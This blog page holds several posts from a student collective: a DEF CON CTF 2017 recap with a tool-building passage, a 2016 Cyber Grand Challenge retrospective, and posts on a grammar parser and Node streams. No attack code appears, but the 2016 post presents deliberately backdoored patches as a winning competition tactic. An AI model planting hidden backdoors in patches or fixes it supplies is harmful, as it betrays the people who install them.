What I had originally intended to be a quick little debugging tool ended up becoming my primary focus for the duration of the competition. When I had sketched out a design of CITRUS on paper, I hadn’t considered the difficulties presented by talking to a system that packed its data differently than the rest of the world. Specifically, in order to use the debugger and emulator simultaneously, it was necessary to communicate with the debugger over STDIN/STDOUT and the program itself over a TCP connection. This seems fine at first, until you consider the event in which you need to send a multiple of nytes not divisible by 8 over a TCP stream. Because the protocol expects to send whole bytes, if cLEMENCy wants to write 5 nytes, it has to write 45 bits of data, followed by 3 bits of padding to make it possible to break the total number of bits written into an even number of bytes.

This alone isn’t an issue — to read a packet of packed nytes, one simply needs to read bits until there aren’t enough to fill a full nyte, then drop the remaining padding. Unfortunately, TCP stacks often try to be intelligent to improve performance. Thus, if two packets come in at the same time, they will be buffered for a short period of time, resulting in them being automatically concatenated before being presented to the application. Once this happens with packed nytes, the stream becomes unreadable — there are an unspecified number of 0 bits used for padding distributed in the buffer where the packet boundaries used to be. My first implementation of CITRUS, which used the Node.js Net module to communicate directly with the emulator, suffered from this exact problem. After spending several hours trying to find a way to deal with this, I ended up spinning up a separate python process to serve as a proxy for communication with the emulator since its TCP stack does not do such buffering.

Mmmm.... Zesty

While this wasn’t the only problem that arose during development, I like it because it illustrates the random problems you can face while working with a system like cLEMENCy. Unfortunately, as a result of some of these issues, CITRUS never really met its original goal. The system worked well locally, but when it was spinning up twenty different emulators, it often choked and died. However, it did prove incredibly helpful for testing network conversations for exploit behaviour, and we were able to use it in a number of ways to aid our defensive stack.

To Those About to Hack…

Once the competition began Friday morning, it was non-stop work. On the competition floor all teams had up to 8 members seated at their team’s workspace. This was the only way to connect to the game’s infrastructure, so while it was not required for team members to play on the floor itself, there was a certain implicit requirement for some portion of the team to be present. In practice, we saw most teams had 6 to 8 people in the competition room for the duration of the game. From the game start onward, rounds progressed every 5 minutes with each team able to submit one flag for each of an opposing team’s services in any given round. On Friday, the game lasted from 10:00 am to 8:00 pm, with a total of 3 challenges (“rubix”, “quarter”, and “internet3”) released that day. The first challenge, “rubix”, was challenging because it was nearly impossible to patch without violating the service functionality tests (which causes a team to forfeit all points associated with the problem during a failed round). The second binary, “quarter”, had the opposite issue wherein by the end of the second day everyone had patched out all of the major bugs. The remaining program, “internet3”, had much more action with exploits being thrown all the way until the game’s end.

Likewise, on Saturday the game lasted from 10:00 am to 8:00 pm with five more challenges released (“babysfirst”, “half”, “legitbbs”, “picturemgr”, and “trackerd”). However, much to our surprise, in spite of the challenge additions, none of the existing challenges were removed. This made it much more difficult to play defense, because it required us to stretch ourselves thin monitoring several different services. Finally, on Sunday the game lasted only from 10:00 am to 2:00 pm with one final challenge (“babyecho”) being released, concluding a frenetic weekend.

…We Salute You

For a precise breakdown of everything that occurred over those three days, I would implore you to examine LegitBS’ data dump from the competition. While I’ve only paid it a cursory glance, you can see a rough graph of how scores progressed over time below:

#defcon25 CTF score graph. CC @LegitBS_CTF pic.twitter.com/UsukelGR24

— Robert Xiao (@nneonneo) July 31, 2017

As the graph shows, the game was very close, with us edging out HITCON by only about 3,000 points. In addition, all of the other teams played very well, and really made the competition exciting. Special Kudos to pasten for first-blooding us with picturemgr. I think we all got a good kick out of that.

With LBS’s departure, we’re not sure what the future of DEF CON CTF holds; however, regardless of what happens, DEF CON 2017 was a blast. Once again, thanks to all of the teams and to LegitBS for an incredibly fun weekend.

A DefCon 2016 Retrospective
Aug 10 2016

Defcon CTF 2016 was held from August 5th to 7th during the annual Defcon conference. This year DARPA chose to host their Cyber Grand Challenge (CGC) — a CTF-style competition between fully autonomous Cyber Reasoning Systems (CRS’) — at Defcon as well, so the Legitimate Business Syndicate oriented their competition around it to allow the winning machine to compete against the human teams. The new format brought with it several interesting gameplay mechanisms as well as a couple of issues, resulting in a fun but occasionally problematic contest. During the competition I played with the Plaid Parliament of Pwning (PPP), with whom I placed first. This is a brief reflection of how the game operated, what succeeded, and what did not.

Overview of the CGC Game Format

The Cyber Grand Challenge game, as designed by DARPA, was meant to be played by autonomous machines, and the design well reflects this. It is an attack-defense style CTF with each team able to throw exploits, submit patches, and view traffic. However, it relies on a rigid api that is well suited to autonomous play. One unique aspect of this game structure is the exploits. Strictly speaking, in CGC exploitation is not required. Instead, teams submit Proofs of Vulnerability (PoVs) that demonstrate the ability to gain access to an opponent’s machine. These PoVs can take one of two forms, and are verified by an automated referee: A type-1 PoV requires the attacker to crash the opponent’s system with a segmentation fault and have control over EIP and one other general purpose register at the time of crash. A type-2 PoV requires instead that the attacker leak four consecutive bytes from the “secret page,” a set of addresses in the range 0x4347C000-0x4347D000 (CG\xC0\x00). Submitting either one of these counts as “proving” the vulnerability, and nets the attacking team a set amount of points.

Another important difference in CGC compared to a traditional CTF is its use of the DARPA Experimental Cyber Research Evaluation Environment, or DECREE. DECREE is a custom build of Linux that only has seven syscalls. These syscalls cover only the most basic functionality, and allow access to the terminate, transmit, receive, fdwait, allocate, deallocate, and random method stubs. No other syscalls are available to binaries running on DECREE. The other, and less significant change is to the executable file format. Almost all aspects of it are the same as the ELF format, except that the three bytes of ELF in the header are replaced with CGC. These changes are significant enough to ensure that DECREE binaries will not run properly in another environment ==without reasonable modification==.

The actual structure of the game is round-based. An attacker may run one exploit per challenge, per team, per round, up to ten times. If any of those ten succeed, the attacking team earns the points for that challenge. If, in addition, they are attacked that round on a service, their service is not responding correctly to non-exploit poller traffic, or their service has poor performance, they earn fewer points for that challenge. Finally, if a team wishes to patch or change one of their binaries, they will not be able to earn any points from that service for a round. As a result, it is important for teams to not only find vulnerabilities quickly, but also actively defend and patch against attacks. Rounds last anywhere from 5 to 15 minutes, with approximately 160 rounds played in the DefCon finals.

Pre-Competition Preparation

Since CGC is designed to be played by machines, all of the information about the game is published through an open API. However this api is unwieldy for humans to interact with by hand, so it was necessary for us to design tools ahead of time to allow for easier interaction.

Among the most important piece of software we developed was Hydra, a well designed and easy to use interface for interacting with the core CGC api. It served as a way to view both offensive and defensive information about individual binaries, track published actions taken by other teams, and manage our own PoVs and patches. On the whole, it served as our main hub for all CGC-related management.

We also developed several tools to aid in the PoV and patching processes. Perhaps the most noteworthy of these was Python-POV, a custom build of python that could target DECREE. The CGC game format requires that Proofs of Vulnerability be DECREE executables that interact with the challenge binary through file descriptors 0,1 and 2, and with the game referee through file descriptor 3. By rewriting certain core python functions and trimming down the available packages, we were able to package a 5 megabyte python interpreter with all of our PoVs. Thus, we were able to write the actual proof functionality in python and bundle it with the static interpreter. The benefit of this was that we were able to use python’s quick scripting syntax and libraries to make PoV development incredibly fast and accessible.

Another remarkably helpful tool we developed was Butcher, a general purpose tool for interacting with the provided network captures. Its primary function was as a replacement for their cb-packet-log program that would produce Packet Capture files (PCAPs) from the incoming connections. Instead of producing one large conglomerate file for the round, Butcher created a PCAP for every connection and challenge. In addition to this, we included several analysis tools that could provide a color coded transcript of the connection, allow for grep-like search, and replay a packet against the original binary while checking for discrepancies. Butcher, unlike many of the tools we used, underwent significant development during the CTF as our needs were more fully realized. Many of these changes are documented further on.

In addition to these tools, we also had a number of single purpose tools that aided us in everything from reversing to patching. They acted as an interface to the CGC environment and allowed us to use non-CGC tools nearly transparently. These tools formed the backbone of our personal infrastructure and allowed us to focus on the competition.

Gameplay and Strategy

While the PPP has a number of members who are strong at binary reversing and exploitation, we find it difficult to compete on a purely exploit-driven level. Instead, we relied heavily on teamwork and distribution of labor to facilitate the process of developing active PoVs and maintaining the necessary patches. Toward this end, we had team members who took on semi-dedicated roles in the competition. Among these jobs were PoV development, infrastructure management and information dissemination, exploit reverse engineering and reflection, network analysis, and patch construction.

PoV development was easily our strongest group, with most people in other roles working on this when the other was not needed. We typically prefer to develop new exploits whenever possible, as this allows us more time to earn points while people patch the more commonly used vulnerabilities. In a similar fashion, we prefer non-reflectable attacks so that other teams cannot copy our attack and use it for themselves. The result of this is that we would often not use a vulnerability as soon as we found it, but instead build on it and turn it into a more secure PoV. We also prefered to develop Type-2 PoVs since they would not log a crash in the CGC database and the defending team would have no indication that they are being exploited other than the point differential. Following this, one of our best exploits was developed by a member who spent all night writing shellcode in PPC — which was being emulated by the program — that could communicate back to the PoV and could not be easily reflected. This ended up being one of our most useful exploits, as we were the only team to develop a patch for it, and to the best of our knowledge, no teams managed to reflect it in any form. Over the course of the game we found and developed a large number of PoVs using these general guidelines.

On the defensive side, we developed a tight pipeline for detecting and reflecting exploits being thrown at us. As mentioned previously, one tool that underwent significant development over the course of the competition was Butcher, our packet analysis tool. Since each team could throw an exploit for each challenge up to ten times, and the referee had to poll the application roughly 300 times a round, we saw approximately 400 to 450 PCAPs per challenge per round. Given that there tended to be about four challenges available at any given time, and each round lasted, on average, 8 minutes, we were receiving roughly 300 packets every minute. This is a tremendous amount of data to go through, and we realized early on that we needed a better way to process it. Beginning after the official competition start time, and continuing through the last day of the competition, we began writing b-suspect, a sub-tool of Butcher that would automatically classify and sort PCAPs. For every round and challenge, it would look at all of the packets that we received and try to coalesce the packets that came from a single source into a bucket. Once it had organized them, it used a heuristic based on a number of different characteristics to rank the packets based on likelihood of exploit. The result was a command line interface that could print out a ranked list of buckets, with indicators explaining how the rank was achieved. From there it gave options to use many of the other tools built into Butcher from this REPL. The final version allowed people to effectively analyze every single packet that interacted with our system. Once a suspicious packet was found, the client data could be passed off to another team member who would analyze it and verify if it was a vulnerability. If they determined that it was in fact a PoV, they would begin the analysis process and try to develop a reflection and patch. If able to successfully reflect it (no attempts were made to obfuscate reflected PoVs), it would be deployed against all teams that were not already being hit. By the end of the competition, we could go from being attacked to reflecting the PoV in about 15 minutes.

One of our biggest surprises came in the form of patches. Despite a joke that everyone would steal PPPs patches, we didn’t really expect it to happen. We had developed excellent patching infrastructure, and so with all of our patches we shipped a relatively unhidden backdoor. We surmised that it would serve as a deterrent from backdoor theft and in a few rare cases provide some free points. However, much to our shock, once we started shipping the backdoored patches, teams began applying our patches without modification to their own challenge binaries. Some teams did modify it enough to change only the checksum, however due to a tool we developed that could automatically test PoVs against patches, this ended up not affecting our ability to use it. Talking to teams following the competition, it seems that several teams actually discovered the backdoor, but decided to employ the patch regardless, deciding that it was better to ensure only one team had access. This may have been well founded, since in the few cases where teams did notice the backdoor and reverted to an earlier patch, we almost always had an actual PoV ready to use against it. It is less clear whether other teams employed backdoors, given that the only times we looked at other teams’ patches were when we needed a team-specific exploit, however a cursory analysis suggested that two other teams did produce them. Factoring in our ability to quickly develop patches for all the bugs we discover as well as the PoVs that were thrown against us, using our mega patches could have worked better than relying on their own or another team’s patch.

Lessons Learned from a First Time DefConer

Given that I joined the PPP only a year ago, this was my first opportunity to play with them at an event like DefCon. As such, it was incredible for me to see the team working together at full capacity, and I found a few things incredibly interesting. This was the first CTF I have played in where the preparations lasted longer than the competition itself. We began work on infrastructure about three weeks before DefCon, and continued working on it through the end of the competition. While none of the tools did our job for us, they freed us from having to do the slow, menial tasks that tend to consume so much time. One rather emphatic member of our team kept insisting that the future of security lies in good tools, and following this competition I believe he may have a point. For me certainly, as a lead developer on Butcher, this competition was as much an engineering challenge as it was a security one.

It was also interesting to see how using such a unique format helped to accentuate several of the more interesting aspects of the CGC game style. In a CGC game, players have to take much greater care to balance offense and defense. While this is certainly a requirement in any attack-defense CTF, since CGC reduces your offense score if your defense is failing, it becomes much harder to decouple the two. As a result, it encourages tight teamwork and integration of all gameplay aspects into the decisions that are made. Encouraging teams to work together to act like a fully-fledged Cyber Reasoning System ends up uniting the group in a way few other CTFs do. In this sense, I really liked the CGC format.

However, as a system designed for massively-parallel computers, CGC has many drawbacks when used with humans. Forcing teams to eat a round of downtime when they apply a patch adds in a tremendous amount of meta-gaming with regard to patch application. In the original Cyber Grand Challenge, CRS’ won and lost based on this availability score, which accounts for not only downtime between patches, but also service unavailability as a result of poor patching. Having watched the DARPA contest, we had a good feel for the importance of not over patching, but many teams did not. While with any attack-defense CTF there is a balance of CTF challenge and meta-game challenge, this high reliance on availability shifted the game more toward meta than I would prefer. While each person will have their own preferences, I enjoy CTF puzzles more than CTF game theory.

Another common complaint about this format is the lack of true exploitation. While my descriptions of the game were rather lax about calling PoVs “exploits,” they ultimately are indicators of a potential exploit, rather than exploits themselves. The end results of this are problems that lean very heavily toward buffer overflows and other types of unbounded access. For many bugs, in fact, there was no need for shellcode or arbitrary execution — the attacker could simply persuade the program to give up the flag. For a CRS, this type of problem makes sense; it can easily be fuzzed and the end goal is very well defined. However, for humans, this often results in problems that are unexciting to exploit and instead rely primarily on reversing. This was not universally true, and many of the challenges had deeper bugs that did require significant exploit development, yet the competition was short enough that many teams did not find even the shallow bugs, and so searching for the deeper ones would yield diminishing returns. Unfortunately, this seems to be the nature of CGC, not simply a poor choice by the organizers.

The most direct issue with using CGC came down to sheer numbers. Every round, the referee had to execute all teams’ POVs, deploy all of the poller traffic, update new files, serve network traffic, and store all of their data for later review. By the end of the game, they had released 8 problems, 5 of which were still actively available. As mentioned previously, every challenge binary received about 400 incoming connections per team, each of which was allowed to run for several seconds. Even if we assume an average of 750ms per connection (to account for many programs which will loop forever instead of quitting), that results in over 6 cpu hours per turn. To simulate their competition, DARPA brought in 7 water-cooled supercomputers. For Defcon CTF the organisers could only acquire two small racks. Turns that were intended to last 5 minutes by the end of the game took roughly 13 minutes to simulate. In one instance, an uploaded binary crashed the system and one turn was re-simulated 16 times. For their part, the Legitimate Business Syndicate made the best with what they had. Unfortunately for them and for the competitors, that simply was not enough.

Finally, while I do not wish to spend much time discussing operational failures, there were a number of them, and so it serves as a good reminder to test and verify everything before connecting players to infrastructure. While it only minimally affected the human teams, for the competing CRS Mayhem, these bugs ended up crippling it.

In spite of this, I would like to congratulate the Forall Secure team. Even though Mayhem was not receiving a significant amount of information about the game, it still managed to throw exploits and develop patches faster than a lot of teams (ourselves included) were able to.

Final Thoughts

While scores have not yet been published, and we do not know the full details about how teams performed, we do know that Defkor placed third after having taken an early lead, B1o0p placed second after a strong showing on the second day, and the Plaid Parliament of Pwning finished in first with what we perceived to be a narrow lead. Without a doubt, Defcon CTF 2016 was one of the most fun CTFs that I have played in. Using CGC was frustrating at times, but with the proper preparation and team unity we were able to overcome many of the challenges that it presented as a format. Furthermore, I am excited by the fact that our team played against not only other human teams, but also a fully functioning Cyber Reasoning System which, despite being crippled for most of the weekend, performed remarkably well. This game was incredibly close, and all of the teams played exceptionally well. I am thrilled that I was able to compete with and against so many amazing teams, and I look forward to Defcon 2017.

Update (September 6th)

LegitBS has posted scores from throughout the competition. In a few days, they should release all of the data from the competition, but for now, they provided this graph of scores over time.

#defcon25 CTF score graph. CC @LegitBS_CTF pic.twitter.com/UsukelGR24

— Robert Xiao (@nneonneo) July 31, 2017

One interesting thing that this graph demonstrates is that around turns 60 and 135 — the start of days two and three respectively — there is a noticable uptick in the slope of our score. It shows how productive our evenings were, and the crucial difference they made in the outcome of the competition.

Context Free Grammars and the Tyranny of Node
May 22 2016

While language and grammar are undoubtably linguistic constructs, they have very practical uses inside the realm of computer science. However, while looking for language and grammar parsing tools written for Node, I was disappointed to find no easy-to-use and suitably-flexible libraries. In response, I began development on Tyranny, a node module that allows for the description and parsing of arbitrary context-free grammars. Here is what it is, how it works, and what it does.

^

What is a language?

In order to understand grammar as it applies to Tyranny, it is helpful to first understand languages. For many, a language is a means for two people to convey ideas that carry across time and space. For programmers, a language is a code specification that can be used to describe procedures and algorithms. However, in computer science and mathematics, the idea of a language is far more abstract. In fact, a language is just a set of words, using a specific alphabet, that are considered “valid.”

An example of this, assuming that we are considering the language that includes only English words, would use an alphabet containing the characters A to Z and a language resembling L = {"A", "AARDVARK", "AARON", "ABDICATE", ...}. If a word w is an element of the set L, then it is in our language. Otherwise, it is not a member of the language. However, since we are ultimately just checking a boolean value for any w (is it contained in L), we can also think of the language as being described by a program M. If M(w) == true, then w is in L, otherwise if M(w) == false, then w is not in L. ==In this case, since M describes the language but is not itself the language, we say that M decides L.==

So What

Tyranny is still very much a work in progress. Even relatively short (~100 Tokens) grammars can take nearly seconds to execute which can cause massive slowdowns during initial compilation and later execution. It also relies on a very limited expression syntax that would benefit from more flexibility. However, it demonstrates the practicality of a context free grammar parser, and fills a gap in currently available javascript modules. If you would like to see more about Tyranny, you can follow development on github or stay tuned for more updates.

Update (4th October 2016)

For those interested, tyranny is finally up and running on npm. While it still has a number of inefficiencies, you can install it with npm install tyranny. If you use it, please report any bugs you find to the above github repository.

Stream Based Processing in Node
Apr 24 2016

Over the past few weeks, I have begun working on a set of tools called hakkit for helping me to write CTF scripts in node.js. Many of the ideas are lifted off of pwnlib, but soon after I started, I realized that by utilizing Node’s stream APIs, I could take my tools a step further than the pwnlib ones. By behaving similar to unix file descriptors, Node streams allow for powerful and extensible data manipulation.

^

What is a Stream

For those who are unfamiliar with streams, streams are a Node-specific API that allow for streaming of data between logical endpoints. At first blush, this can seem relatively useless, wouldn’t it be easier to store everything in an object and just pass that around? While this is often true for small pieces of data, once you add on several layers of abstraction and multiple types of data manipulation, the code can become unwieldy and slow. Instead, a stream lets you manipulate and parse data as you go, while keeping the memory allocation (buffers) small, and reducing the access time for data retrieval and updating.

Take, for instance, the act of searching for a word in the dictionary. If this has to be done repeatedly, it may be worthwhile to store its contents in memory. If, however, it only needs to be checked once, then it makes much more sense to stream the data. As the data is read in from the file, it can be immediately checked for the desired contents, and then discarded once the data has been checked. Furthermore, the process can stop reading once it has found the entry it is looking for.

Ultimately, a stream is a data processing mechanism that has one of the following attributes

  • It can supply data to another stream (readable)
  • It can consume data from another stream (writable)
  • It can transform data from one stream and send it to another (transform)
  • It can both supply and consume data from either a single stream or two different streams (duplex)

These streams can then be “piped” together into a more powerful stream capable of doing complex data manipulation. Here is an example of a very simple stream that reads in data, converts it to hex, and writes it back to the file system.

Notice that this stream is not duplexed — data can only flow one direction. This is actually the most common way to use a stream, and the way most people are used to seeing them (even if they don’t recognise it as a stream). Notice how I mentioned that one stream can be “piped” into another, if that sounds similar to sh terminology — that is because there is an incredible similarity. Although node implements them with buffers and objects, Node streams are logically equivalent to file descriptor (fd) streams in *nix systems. In the same way that you could run

$ cat input.txt | hexify > output.txt

to perform a similar function by redirecting the file descriptor, node streams can be just as easily chained.

Why Use Streams

Given this, what are the advantages of using streams in Node? In addition to the aforementioned speed and memory benefits, one of the most obvious answers is modularity. This is a buzzword that Node developers especially love to throw around, but it does have some merit to it. Just as shell commands can be used in a number of different applications, a well developed stream can be applied to numerous use cases without needing to be modified. In addition, streams are designed to emulate how a generic application runs, and can interface very easily with a wide number of data sources. One thing that surprised me while working on HakKit was how easy interfacing with a non-node command was using streams. Streams also benefit from being either lazy or greedy, depending on what the writable stream wants, and what the readable stream can provide. As a result, it can easily handle infinite or non-halting data sources (such as a network request).

However, despite all these benefits, streams are infrequently used in module APIs. Aside from packages that use them internally but never expose them, the only package I have spent any considerable amount of time with that used data streams was node-png. At first, I was also reluctant to use them despite their obvious benefits. Ultimately, I think this arises because streams are confusing and not especially well documented. While streams are a great fit for Node’s asynchronous structure, oftentimes developers are used to them behaving synchronously, such as in shell commands which have the benefit of being both intuitive and concise.

With HakKit, I have started to abstract the actual stream implementation away and provide instead a generic api that can be used for interfacing with any type of stream. For instance, the following code will perform the dictionary searching as mentioned earlier

var hakkit = require("hakkit")
var file = new hakkit.file("/usr/share/dict/web2")
var tube = new hakkit.tube(file)
var data = tube.recvline()
while (data) {
    if (data.toString() == "banana\n") {
        console.log("Found")
        tube.close()
        break
    }
    data = tube.recvline()
}

While this certainly is not as concise as

$ cat /usr/share/dict/web2 | grep "banana"

it starts to approach a level of readability while maintaining the full functionality of javascript syntax. More importantly, because each of these objects are just abstracted streams, it provides the same underlying functionality as the shell command. Forcing an inherently asynchronous task to be synchronous — such as through the use of tube.recvline() — has clear issues associated with it, yet ease of use and intuitiveness is often crucial for designing good scripting tools, and the hope is that this syntax balances between the two.

While streams are not practical for every application, there are many cases in which a stream makes the most sense for manipulating data. Hopefully this was helpful, and keep an eye out for new developments with HakKit.

Welcome
Feb 29 2016

Welcome to Down to the Wire!

In the coming weeks we will start adding posts and discussing current projects and goals, including an upcoming post about developing Down to the Wire itself. Until then, however, I wanted to share a little bit about what DttW is, and why we decided to start it.

^

Who we are

Our team is a group of college students who attended the same high school together and then went on to different universities. We had all been planning to create our own personal blogs in order to keep a record of our own projects, competitions, and other cool tech related news.

However, instead of us each starting our own blog – which would have been difficult to maintain and would not have received much visibility – several of us decided to start a collective blog so that we could help each other and provide a more steady stream of content.

What this is

To accomodate all of us, we built Down to the Wire, something of a mix between a news site and a blog. With it, we hope to have a forum to not only share our ideas with the world, but also help others who have related interests and engage in discussion about the current state of technology. Each of us has different interests, ranging from security to competition programming to game development, so we hope that anyone will be able to find something interesting here. We hope that you will join us in this endeavor and that Down to the Wire will be something special.

Thanks,

The Down to the Wire team.

CTF Problems

Yet Another Calculator App
PlaidCTF 2022
web
Live Art
PicoCTF 2022
web
The Watness III
PlaidCTF 2021
web
reversing
Wowza!
PlaidCTF 2021
web
Bithug
PicoCTF 2021
web
PGUI
ASV CTF2
web
misc
The Watness II
PlaidCTF 2020
reversing
Contrived Web Problem
PlaidCTF 2020
web
MiniCTF
Standalone
web
reversing
misc
Lambdash
PicoCTF 2019
web
The .Wat ness
PlaidCTF 2019
web
reversing
Everland
PlaidCTF 2019
misc
S-Exploitation
PlaidCTF 2018
web
reversing
Datastore
GoogleCTF 2017
crypto
misc